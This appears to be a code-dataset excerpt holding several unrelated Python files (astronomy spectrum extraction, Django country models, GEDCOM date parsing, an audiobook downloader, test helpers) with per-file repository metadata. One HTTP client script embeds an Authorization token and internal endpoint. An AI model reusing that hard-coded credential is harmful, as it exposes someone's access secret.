if weight[i] > 0 :
ax[0].plot([cents[i],cents[i]],[0,ymax],'g')
else :
ax[0].plot([cents[i],cents[i]],[0,ymax],'r')
plt.draw()
# get input from user on lines to remove
for i in range(len(cents)) :
print(' {:3d}{:8.2f}{:8.2f}{:8.2f}{:8.2f}{:8.2f}'.format(
i, cents[i], wcal.wave(cents[i]), waves[i], waves[i]-wcal.wave(cents[i]),weight[i]))
print(' rms: {:8.2f} Anstroms'.format(diff.std()))
i = input('enter ID of line to remove (-n for all lines<n, +n for all lines>n, return to continue): ')
if i is '' :
done = True
elif '+' in i :
weight[int(i)+1:] = 0.
elif '-' in i :
weight[0:abs(int(i))] = 0.
elif int(i) >= 0 :
weight[int(i)] = 0.
else :
print('invalid input')
plt.close()
return wcal.wave(pix),wcal
def fluxcal(obs,wobs,file=None) :
"""
flux calibration
"""
fluxdata=ascii.read(file)
stan=np.interp(wobs,fluxdata['col1'],fluxdata['col2'])
return stan/obs
def trace(hd,apertures=None,pix0=1024) :
""" Get all traces
apertures is a list of row numbers at pixel 1024
"""
alltr=[]
for i in range(len(apertures)) :
tr=Trace()
print('tracing aperture {:d}'.format(i),end='\r')
sr=apertures[i]
tr.trace(hd,pix0,sr)
alltr.append(tr)
return alltr
def extract(hd,apertures) :
""" Do all extractions
"""
spec = np.zeros([len(apertures),hd.data.shape[1]])
for i,order in enumerate(apertures) :
print('extracting aperture {:d}'.format(i),end='\r')
spec[i] = order.extract(hd)
return spec
| 41.357798
| 143
| 0.519188
| 4,870
| 36,064
| 3.830185
| 0.113347
| 0.010293
| 0.01544
| 0.008256
| 0.413499
| 0.348362
| 0.293894
| 0.261298
| 0.230955
| 0.188013
| 0
| 0.029563
| 0.33313
| 36,064
| 871
| 144
| 41.405281
| 0.746029
| 0.086957
| 0
| 0.284058
| 0
| 0.004348
| 0.061174
| 0.00289
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036232
| false
| 0.005797
| 0.024638
| 0
| 0.085507
| 0.046377
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee8a8f31356455e4042f8f9fd8906eb324b18cec
| 3,165
|
py
|
Python
|
countries/models.py
|
Valuehorizon/valuehorizon-countries
|
04398f518ef5977cf4ccd2c2bffd7955d6a6e095
|
[
"MIT"
] | 3
|
2015-05-27T17:11:28.000Z
|
2016-07-08T18:01:28.000Z
|
countries/models.py
|
Valuehorizon/valuehorizon-countries
|
04398f518ef5977cf4ccd2c2bffd7955d6a6e095
|
[
"MIT"
] | 5
|
2020-02-11T22:27:18.000Z
|
2021-12-13T19:40:25.000Z
|
countries/models.py
|
Valuehorizon/valuehorizon-countries
|
04398f518ef5977cf4ccd2c2bffd7955d6a6e095
|
[
"MIT"
] | null | null | null |
from django.db import models
from forex.models import Currency
class Country(models.Model):
"""
Represents a country, such as the US, or Mexico.
"""
name = models.CharField(max_length=255, blank=True, null=True, help_text="Official Country name (ISO Full name)")
currency = models.ManyToManyField(Currency, help_text="Official currencies for this country. More than one currency is possible")
symbol_alpha2_code = models.CharField(help_text="ISO 3166-1 alpha-2 symbol", max_length=2, unique=True)
symbol_alpha3_code = models.CharField(help_text="ISO 3166-1 alpha-3 symbol", max_length=3, unique=True)
is_independent = models.BooleanField()
numeric_code = models.PositiveSmallIntegerField()
remark_1 = models.TextField(blank=True)
remark_2 = models.TextField(blank=True)
remark_3 = models.TextField(blank=True)
territory_name = models.TextField(blank=True)
ISO_STATUS_CHOICES = (
(u'EXR', u'Exceptionally reserved'),
(u'FRU', u'Formerly used'),
(u'INR', u'Indeterminately reserved'),
(u'OFF', u'Officially assigned'),
(u'TRR', u'Transitionally reserved'),
(u'UND', u'Unassigned'),
)
iso_status = models.CharField(max_length=3, choices=ISO_STATUS_CHOICES, default="UND")
# Additional helpful fields
common_name = models.CharField(max_length=255, unique=True, help_text="Common Country name")
in_name = models.CharField(max_length=255, help_text="The name of the country after the word 'in'. Useful for Autogeneration.")
class Meta:
verbose_name_plural = 'Countries'
verbose_name = 'Country'
ordering = ['name', ]
def __unicode__(self):
return u'%s' % (unicode(self.common_name))
class Region(models.Model):
"""
Represents a region, such as the Latin America, or Europe.
"""
name = models.CharField(max_length=255, unique=True)
country = models.ManyToManyField(Country)
symbol = models.CharField(max_length=4)
class Meta:
verbose_name_plural = 'Regions'
verbose_name = 'Region'
ordering = ['name', ]
def __unicode__(self):
return u'%s' % (unicode(self.name))
class City(models.Model):
"""
Represents a city within a country
"""
name = models.CharField(max_length=255)
symbol = models.CharField(max_length=255, blank=True)
country = models.ForeignKey(Country)
class Meta:
verbose_name_plural = 'Cities'
verbose_name = 'City'
ordering = ['name', ]
unique_together = (("name", "country"), )
def __unicode__(self):
return u'%s, %s' % (unicode(self.name), unicode(self.country.name))
class Government(models.Model):
"""
Represents a government of a country, such as the
'Government of Australia'.
"""
name = models.CharField(max_length=255)
country = models.ForeignKey(Country)
class Meta:
verbose_name_plural = 'Governments'
verbose_name = 'Government'
ordering = ['name', ]
unique_together = (("name", "country"), )
def __unicode__(self):
return u'%s' % (unicode(self.name))
| 31.969697
| 133
| 0.663507
| 389
| 3,165
| 5.231362
| 0.282776
| 0.081081
| 0.079607
| 0.106143
| 0.418673
| 0.329238
| 0.281572
| 0.246192
| 0.205897
| 0.102211
| 0
| 0.016888
| 0.214218
| 3,165
| 98
| 134
| 32.295918
| 0.801367
| 0.078041
| 0
| 0.327869
| 0
| 0
| 0.17216
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065574
| false
| 0
| 0.032787
| 0.065574
| 0.655738
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee8bfc979ac28197031d9f486d5e391436cd294c
| 920
|
py
|
Python
|
export.py
|
philtgun/mediaeval-emothemes-explorer
|
647fe527b719a9be72265f2855d890823c70e8ab
|
[
"MIT"
] | 1
|
2021-11-25T08:08:33.000Z
|
2021-11-25T08:08:33.000Z
|
export.py
|
philtgun/mediaeval-emothemes-explorer
|
647fe527b719a9be72265f2855d890823c70e8ab
|
[
"MIT"
] | null | null | null |
export.py
|
philtgun/mediaeval-emothemes-explorer
|
647fe527b719a9be72265f2855d890823c70e8ab
|
[
"MIT"
] | null | null | null |
import argparse
from pathlib import Path
import json
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib import rcParams
def main(input_file: Path, output_file: Path) -> None:
with input_file.open('r') as fp:
data = json.load(fp)
plt.figure(figsize=(20, 13))
rcParams['font.family'] = 'serif'
rcParams['font.serif'] = 'Times New Roman'
plt.tick_params(left=False, bottom=False)
sns.heatmap(data['z'][::-1], xticklabels=data['x'], yticklabels=data['y'][::-1], cmap='mako_r') # YlGnBu_r, mako_r
plt.savefig(output_file, bbox_inches='tight', dpi=150)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('input', type=Path, help='Input JSON file, generated by process.py')
parser.add_argument('output', type=Path, help='Output file containing the figure')
args = parser.parse_args()
main(args.input, args.output)
| 32.857143
| 119
| 0.695652
| 132
| 920
| 4.69697
| 0.545455
| 0.048387
| 0.054839
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011628
| 0.158696
| 920
| 27
| 120
| 34.074074
| 0.789406
| 0.017391
| 0
| 0
| 0
| 0
| 0.16408
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.285714
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee8f0359e2f8322c643b0be99995a5abb3f922f2
| 3,436
|
py
|
Python
|
tests/test_cascade_call.py
|
xyloon/ptrait
|
88186f77feaf921c44633b1693fed1e124f99c76
|
[
"MIT"
] | null | null | null |
tests/test_cascade_call.py
|
xyloon/ptrait
|
88186f77feaf921c44633b1693fed1e124f99c76
|
[
"MIT"
] | 1
|
2019-04-20T08:22:04.000Z
|
2019-04-20T08:22:04.000Z
|
tests/test_cascade_call.py
|
xyloon/ptrait
|
88186f77feaf921c44633b1693fed1e124f99c76
|
[
"MIT"
] | null | null | null |
from ptrait import TraitExtends
import copy
from pytest_assertutil import assert_equal
class IntfA:
@classmethod
@TraitExtends.mark
def a_classmethodA(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 1
return args, kwa
@classmethod
@TraitExtends.mark
def a_classmethodC(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodA(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 1
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodC(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@TraitExtends.mark
def a_instancemethodA(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 1
return args, kwa
@TraitExtends.mark
def a_instancemethodC(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
class IntfB:
@classmethod
@TraitExtends.mark
def a_classmethodB(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 2
return args, kwa
@classmethod
@TraitExtends.mark
def a_classmethodC(cls, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodB(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 2
return args, kwa
@staticmethod
@TraitExtends.mark
def a_staticmethodC(*args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@TraitExtends.mark
def a_instancemethodB(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 2
return args, kwa
@TraitExtends.mark
def a_instancemethodC(self, *args, **kwargs):
kwa = copy.deepcopy(kwargs)
kwa['a'] = kwargs.get('a', 0) + 3
return args, kwa
@TraitExtends.cascade(IntfA, IntfB)
class A:
pass
def test_cascade_call_instanceA():
assert_equal(
((), {'a': 1}),
A().a_instancemethodA()
)
def test_cascade_call_instanceB():
assert_equal(
((), {'a': 2}),
A().a_instancemethodB()
)
def test_cascade_call_instanceC():
assert_equal(
((), {'a': 3}),
A().a_instancemethodC()
)
def test_cascade_call_staticmethodA():
assert_equal(
((), {'a': 1}),
A.a_staticmethodA()
)
def test_cascade_call_staticmethodB():
assert_equal(
((), {'a': 2}),
A.a_staticmethodB()
)
def test_cascade_call_staticmethodC():
assert_equal(
((), {'a': 3}),
A.a_staticmethodC()
)
def test_cascade_call_classmethodA():
assert_equal(
((), {'a': 1}),
A.a_classmethodA()
)
def test_cascade_call_classmethodB():
assert_equal(
((), {'a': 2}),
A.a_classmethodB()
)
def test_cascade_call_classmethodC():
assert_equal(
((), {'a': 3}),
A.a_classmethodC()
)
| 21.746835
| 49
| 0.568102
| 399
| 3,436
| 4.744361
| 0.112782
| 0.114105
| 0.120444
| 0.126783
| 0.690438
| 0.657686
| 0.586371
| 0.586371
| 0.586371
| 0.586371
| 0
| 0.013387
| 0.282596
| 3,436
| 157
| 50
| 21.88535
| 0.754564
| 0
| 0
| 0.661157
| 0
| 0
| 0.009604
| 0
| 0
| 0
| 0
| 0
| 0.082645
| 1
| 0.173554
| false
| 0.008264
| 0.024793
| 0
| 0.322314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c988bda85797c24c33439e544dc67c890a456828
| 7,220
|
py
|
Python
|
life_line_chart/GedcomParsing.py
|
mustaqimM/life_line_chart
|
a9bbbbdeb5568aa0cc3b3b585337a3d655f4b2d6
|
[
"MIT"
] | null | null | null |
life_line_chart/GedcomParsing.py
|
mustaqimM/life_line_chart
|
a9bbbbdeb5568aa0cc3b3b585337a3d655f4b2d6
|
[
"MIT"
] | null | null | null |
life_line_chart/GedcomParsing.py
|
mustaqimM/life_line_chart
|
a9bbbbdeb5568aa0cc3b3b585337a3d655f4b2d6
|
[
"MIT"
] | null | null | null |
import datetime
import re
import os
import logging
import json
_months = [
"JAN",
"FEB",
"MAR",
"APR",
"MAY",
"JUN",
"JUL",
"AUG",
"SEP",
"OCT",
"NOV",
"DEC"
]
_precision = [
'ABT',
'CAL',
'EST',
'AFT',
'BEF'
]
_date_expr = re.compile('(?:(' + '|'.join(_precision) + ') )?(?:(\\d+) )?(?:(' + '|'.join(_months) + ') )?(\\d{4})')
_interval_expr = re.compile('(BET) (?:(\\d+) (' + '|'.join(_months) + ') )?(\\d{4}) AND (?:(\\d+) (' + '|'.join(_months) + ') )?(\\d{4})')
_max_days = {
1:31,
2:29,
3:31,
4:30,
5:31,
6:30,
7:31,
8:31,
9:30,
10:31,
11:30,
12:31
}
def get_date_dict_from_tag(parent_item, tag_name):
"""
read the date from a gedcom tag
Args:
parent_item (dict): parent event node to output the result
tag_name (str): event type
"""
# TODO: Implement BET = Between
try:
if tag_name not in parent_item:
return
if 'DATE' not in parent_item[tag_name]:
return
comment = None
precision = ''
content = parent_item[tag_name]['DATE']['tag_data']
date_info = _date_expr.match(content)
if date_info is None:
date_info = _interval_expr.match(content)
if date_info.group(1) == 'EST':
comment = 'Estimated'
elif date_info.group(1) == 'ABT':
comment = 'About'
elif date_info.group(1) == 'CAL':
comment = 'Calculated'
elif date_info.group(1) == 'AFT':
comment = 'After'
elif date_info.group(1) == 'BEF':
comment = 'Before'
elif date_info.group(1) == 'BET':
comment = 'Between'
elif date_info.group(2) is None and date_info.group(3) is None and date_info.group(4) is not None:
comment = 'YearPrecision'
month_max_, day_max_ = 12, 31
month_min_, day_min_ = 1, 1
year_min, year_max = None, None
month_max, day_max = None, None
month_min, day_min = None, None
if date_info.group(1) == 'BET':
if date_info.group(7):
year_max = int(date_info.group(7))
if date_info.group(6):
month_max = _months.index(date_info.group(6)) + 1
if date_info.group(5):
day_max = int(date_info.group(5))
if date_info.group(4):
year_min = int(date_info.group(4))
if not year_max:
year_max = year_min
precision = 'y' + precision
if date_info.group(3):
month_min = _months.index(date_info.group(3)) + 1
if not month_max:
month_max = month_min
precision = 'm' + precision
if date_info.group(2):
day_min = int(date_info.group(2))
if not day_max:
day_max = day_min
precision = 'd' + precision
if date_info.group(1) == 'AFT':
year_max = year_min + 15
elif date_info.group(1) == 'BEF':
year_min = year_max - 15
if not month_max: month_max = month_max_
if not month_min: month_min = month_min_
if not day_max: day_max = day_max_
if not day_min: day_min = day_min_
day_max = min(_max_days[month_max], day_max)
date_min = datetime.datetime(year_min, month_min, day_min, 0, 0, 0, 0)
try:
date_max = datetime.datetime(year_max, month_max, day_max, 0, 0, 0, 0)
except ValueError as e:
if month_max==2:
date_max = datetime.datetime(year_max, month_max, day_max, 0, 0, 0, 0)
else:
raise
if tag_name in ['BURI', 'DEAT']:
# if unknown move to the end of the year
date = date_max
else:
# if unknown move to the beginning of the year
date = date_min
return {
'tag_name': tag_name,
'date': date,
'ordinal_value': date.toordinal(),
'ordinal_value_max': date_max.toordinal(),
'ordinal_value_min': date_min.toordinal(),
'comment': comment,
'precision' : precision
}
except:
pass
def _get_relevant_events(database_indi, individual_id, target):
parent_item = database_indi[individual_id].get('BIRT')
if parent_item:
target['birth'] = get_date_dict_from_tag(
database_indi[individual_id], 'BIRT')
if target['birth'] is None:
target.pop('birth')
parent_item = database_indi[individual_id].get('CHR')
if parent_item:
target['christening'] = get_date_dict_from_tag(
database_indi[individual_id], 'CHR')
if target['christening'] is None:
target.pop('christening')
parent_item = database_indi[individual_id].get('BAPM')
if parent_item:
target['baptism'] = get_date_dict_from_tag(
database_indi[individual_id], 'BAPM')
if target['baptism'] is None:
target.pop('baptism')
parent_item = database_indi[individual_id].get('DEAT')
if parent_item:
target['death'] = get_date_dict_from_tag(
database_indi[individual_id], 'DEAT')
if target['death'] is None:
target.pop('death')
parent_item = database_indi[individual_id].get('BURI')
if parent_item:
target['burial'] = get_date_dict_from_tag(
database_indi[individual_id], 'BURI')
if target['burial'] is None:
target.pop('burial')
if 'birth' in target:
target['birth_or_christening'] = target['birth']
elif 'birth_or_christening' not in target and 'christening' in target:
target['birth_or_christening'] = target['christening']
elif 'birth_or_christening' not in target and 'baptism' in target:
target['birth_or_christening'] = target['baptism']
else:
target['birth_or_christening'] = None
if 'death' in target:
target['death_or_burial'] = target['death']
elif 'death_or_burial' not in target and 'burial' in target:
target['death_or_burial'] = target['burial']
else:
target['death_or_burial'] = None
def estimate_marriage_date(family):
"""
If the marriage date is unknown, then estimate the date by assuming:
- the marriage took place before the first child was born
Args:
family (BaseFamily): family instance
"""
if family.marriage is None:
children_events = []
for child in family.children_individual_ids:
child_events = {}
_get_relevant_events(family._database_indi, child, child_events)
if child_events['birth_or_christening']:
children_events.append(child_events['birth_or_christening'])
# unsorted_marriages = [family._instances[('f',m)] for m in family._marriage_family_ids]
if len(children_events) > 0:
sorted_pairs = list(zip([(m['ordinal_value'], i) for i, m in enumerate(
children_events)], children_events))
sorted_pairs.sort()
family.marriage = sorted_pairs[0][1]
| 31.666667
| 138
| 0.570083
| 920
| 7,220
| 4.207609
| 0.181522
| 0.0558
| 0.080599
| 0.068199
| 0.382847
| 0.251356
| 0.215707
| 0.097649
| 0.079049
| 0.0248
| 0
| 0.018804
| 0.307618
| 7,220
| 227
| 139
| 31.806167
| 0.755551
| 0.071053
| 0
| 0.091892
| 0
| 0
| 0.116276
| 0
| 0
| 0
| 0
| 0.004405
| 0
| 1
| 0.016216
| false
| 0.005405
| 0.027027
| 0
| 0.059459
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c98a4eea5dbbc32238c561ae29365092efd245e1
| 4,020
|
py
|
Python
|
lib/HimalayanDownloader.py
|
oldfatcrab/Himalayan
|
8b879036dd33c406b48306f560f9df85c989908b
|
[
"MIT"
] | null | null | null |
lib/HimalayanDownloader.py
|
oldfatcrab/Himalayan
|
8b879036dd33c406b48306f560f9df85c989908b
|
[
"MIT"
] | null | null | null |
lib/HimalayanDownloader.py
|
oldfatcrab/Himalayan
|
8b879036dd33c406b48306f560f9df85c989908b
|
[
"MIT"
] | null | null | null |
from HTMLParser import HTMLParser
import json
from os import makedirs
from os.path import abspath, dirname, exists, join, normpath
import pycurl
import Queue
import re
import requests
import tempfile
import urllib2
class HimalayanDownloader:
def __init__(self, eBookUrl, logger):
self._logger = logger
self._eBookUrl = eBookUrl
self._failedTracksQueue = None
self._downloadQueue = Queue.Queue()
self._completedQueue = Queue.Queue()
self._maxTrial = 10
self._trial = 0
self._hp = HTMLParser()
self._trackUrlDir = 'http://www.ximalaya.com/tracks/'
self._bookName = self.getBookName()
def getBookName(self):
response = urllib2.urlopen(self._eBookUrl)
html = response.read()
pattern = re.compile('<h1>(.*?)</h1>', re.S)
rawName = re.findall(pattern, html)[0].decode('utf-8')
return self._hp.unescape(rawName).replace(':', '_')
def download(self):
self._logger.info('Downloading book <<' + self._bookName + '>>')
currPath = join(dirname(abspath(__file__)), '..')
bookPath = normpath(join(currPath, self._bookName))
self._logger.info('Files can be found in: ' + bookPath)
if not exists(bookPath):
makedirs(bookPath)
self.fetchTracks()
while self._trial < self._maxTrial:
self._failedTracksQueue = Queue.Queue()
while not self._downloadQueue.empty():
track = self._downloadQueue.get()
self.downloadTrack(track[0], track[1])
if self._failedTracksQueue.empty():
break
else:
self._downloadQueue = self._failedTracksQueue
self._trail += 1
self._logger.info('Finished downloading book <<' + self._bookName + '>>')
return self._completedQueue
def downloadTrack(self, url, fileName):
self._logger.info('Downloading track: ' + fileName)
self._logger.debug('Track URL: ' + url)
tmpFileName = url.split('/')[-1]
tmpFilePath = normpath(join(tempfile.gettempdir(), tmpFileName))
with open(tmpFilePath, 'wb') as f:
c = pycurl.Curl()
c.setopt(c.URL, url)
c.setopt(c.WRITEDATA, f)
try:
c.perform()
except pycurl.error as e:
self._logger.error('ERROR occurred: ' + e.message)
self._logger.debug('Adding "' + fileName + '" to re-download tasks')
self._failedTracksQueue.put((url, fileName))
else:
c.close()
self._completedQueue.put((tmpFilePath, self._bookName, fileName))
def fetchTracks(self):
pageNum = 1
trackQueue= Queue.Queue()
while True:
pageUrl = self._eBookUrl + '?page=%d' % pageNum
self._logger.debug('Fetching page: ' + pageUrl)
response = urllib2.urlopen(pageUrl)
html = response.read()
self._logger.debug('Analyzing page: ' + pageUrl)
pattern = re.compile('<a class="title" href="(.*?)" hashlink title="(.*?)">', re.S)
results = re.findall(pattern, html)
if not results:
break
for result in results:
trackQueue.put(result)
pageNum += 1
indexLength = len(str(trackQueue.qsize()))
index = 0
while not trackQueue.empty():
index += 1
track = trackQueue.get()
jsonUrl = self._trackUrlDir + track[0].split('sound/')[-1] + '.json'
self._logger.debug('Loading JSON: ' + jsonUrl)
resp = requests.get(url=jsonUrl)
data = json.loads(resp.text)
fileName = self._bookName + '_' + str(index).zfill(indexLength) + '_'
fileName += self._hp.unescape(track[1].decode('utf-8')).replace(':', '_')
url = data['play_path']
self._downloadQueue.put((url, fileName))
| 39.029126
| 95
| 0.573632
| 410
| 4,020
| 5.487805
| 0.341463
| 0.048889
| 0.033333
| 0.017778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007813
| 0.299502
| 4,020
| 102
| 96
| 39.411765
| 0.791193
| 0
| 0
| 0.063158
| 0
| 0
| 0.085096
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.105263
| 0
| 0.189474
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c98cba25f4d6645c123d4fc4d2170d2512dffa18
| 820
|
py
|
Python
|
dl/state.py
|
eric-erki/Prometheus
|
def07745ebcbe08ebb2fbba124bd07873edc8c9c
|
[
"MIT"
] | null | null | null |
dl/state.py
|
eric-erki/Prometheus
|
def07745ebcbe08ebb2fbba124bd07873edc8c9c
|
[
"MIT"
] | null | null | null |
dl/state.py
|
eric-erki/Prometheus
|
def07745ebcbe08ebb2fbba124bd07873edc8c9c
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
from prometheus.utils.misc import FrozenClass
class RunnerState(FrozenClass):
"""
An object that is used to pass internal state during train/valid/infer.
"""
def __init__(self, **kwargs):
# data
self.device = None
self.input = None
self.output = None
self.loader = None
self.loader_mode = None
# counters
self.bs = 0
self.step = 0
self.epoch = 0
# metrics
self.lr = defaultdict(lambda: 0)
self.momentum = defaultdict(lambda: 0)
self.loss = None
self.epoch_metrics = None
self.best_metrics = None
# other
self.is_train = False
for k, v in kwargs.items():
setattr(self, k, v)
self._freeze()
| 22.777778
| 75
| 0.570732
| 96
| 820
| 4.78125
| 0.5625
| 0.104575
| 0.061002
| 0.095861
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009294
| 0.343902
| 820
| 35
| 76
| 23.428571
| 0.843866
| 0.121951
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.095238
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c991092ab3a5e6ba800ee09dfef81c31b1bd3d3c
| 1,262
|
py
|
Python
|
t2t_bert/pretrain_finetuning/test_green_sample.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 34
|
2018-12-19T01:00:57.000Z
|
2021-03-26T09:36:37.000Z
|
t2t_bert/pretrain_finetuning/test_green_sample.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 11
|
2018-12-25T03:37:59.000Z
|
2021-08-25T14:43:58.000Z
|
t2t_bert/pretrain_finetuning/test_green_sample.py
|
yyht/bert
|
480c909e0835a455606e829310ff949c9dd23549
|
[
"Apache-2.0"
] | 9
|
2018-12-27T08:00:44.000Z
|
2020-06-08T03:05:14.000Z
|
#-*- coding: utf-8 -*-
import requests
import numpy as np
import json
import concurrent.futures
import codecs
with codecs.open('./test_1.txt', 'r', 'utf-8') as frobj:
input1 = frobj.read().strip()
with codecs.open('./candidate_1.txt', 'r', 'utf-8') as frobj:
candidate1 = frobj.read().strip()
with codecs.open('./test_2.txt', 'r', 'utf-8') as frobj:
input1 = frobj.read().strip()
with codecs.open('./candidate_2.txt', 'r', 'utf-8') as frobj:
candidate1 = frobj.read().strip()
post_data_1 = {
"data":{
"query":input1,
"candidate":[candidate1]
}
}
def create_http_session(config):
session = requests.Session()
a = requests.adapters.HTTPAdapter(max_retries=config.get("max_retries", 3),
pool_connections=config.get("pool_connections", 100),
pool_maxsize=config.get("pool_maxsize", 100))
session.mount('http://', a)
return session
session = create_http_session({})
def infer_data():
headers = {}
headers["Authorization"] = "ZWE5Y2FmNTgxMjA2NzdmOTJlOTEyMTllNmFkMTI4MDg4ZDk5OGMzYQ=="
response = requests.post("http://11.31.153.212:58756/api/predict/pi_text_similarity_match_v1_bj_90ebb4d6",
data=json.dumps(input_data))
results = (response.content)
return results
resp = infer(post_data_1)
print(resp)
| 25.755102
| 107
| 0.698891
| 169
| 1,262
| 5.065089
| 0.420118
| 0.023364
| 0.065421
| 0.037383
| 0.247664
| 0.247664
| 0.231308
| 0.226636
| 0.226636
| 0.226636
| 0
| 0.045662
| 0.13233
| 1,262
| 48
| 108
| 26.291667
| 0.736073
| 0.01664
| 0
| 0.111111
| 0
| 0
| 0.23629
| 0.045161
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.138889
| 0
| 0.25
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c993d47a6ac0a9f61ec7fa06b4e0b59229dbea51
| 527
|
py
|
Python
|
tests/resources/greeting_resoource.py
|
NoeCruzMW/zpy-flask-msc
|
9c2fdcc7e7bdbe3eed4522bfc68afcc00ad5994a
|
[
"MIT"
] | null | null | null |
tests/resources/greeting_resoource.py
|
NoeCruzMW/zpy-flask-msc
|
9c2fdcc7e7bdbe3eed4522bfc68afcc00ad5994a
|
[
"MIT"
] | null | null | null |
tests/resources/greeting_resoource.py
|
NoeCruzMW/zpy-flask-msc
|
9c2fdcc7e7bdbe3eed4522bfc68afcc00ad5994a
|
[
"MIT"
] | null | null | null |
from zpy.api.resource import ZResource, HTTP_METHODS
class GreetingResource(ZResource):
blocked_methods = [
HTTP_METHODS.POST,
HTTP_METHODS.DELETE,
HTTP_METHODS.PATCH,
HTTP_METHODS.PUT,
]
def __init__(self, **kwargs) -> None:
super().__init__()
def get(self):
l, i = super().new_operation()
try:
return self.success({"greeting": "hello world!"}, logger=l)
except Exception as e:
return self.handle_exceptions(e, l, i)
| 23.954545
| 71
| 0.601518
| 60
| 527
| 5.016667
| 0.65
| 0.182724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.28463
| 527
| 21
| 72
| 25.095238
| 0.798408
| 0
| 0
| 0
| 0
| 0
| 0.037951
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.0625
| 0
| 0.4375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
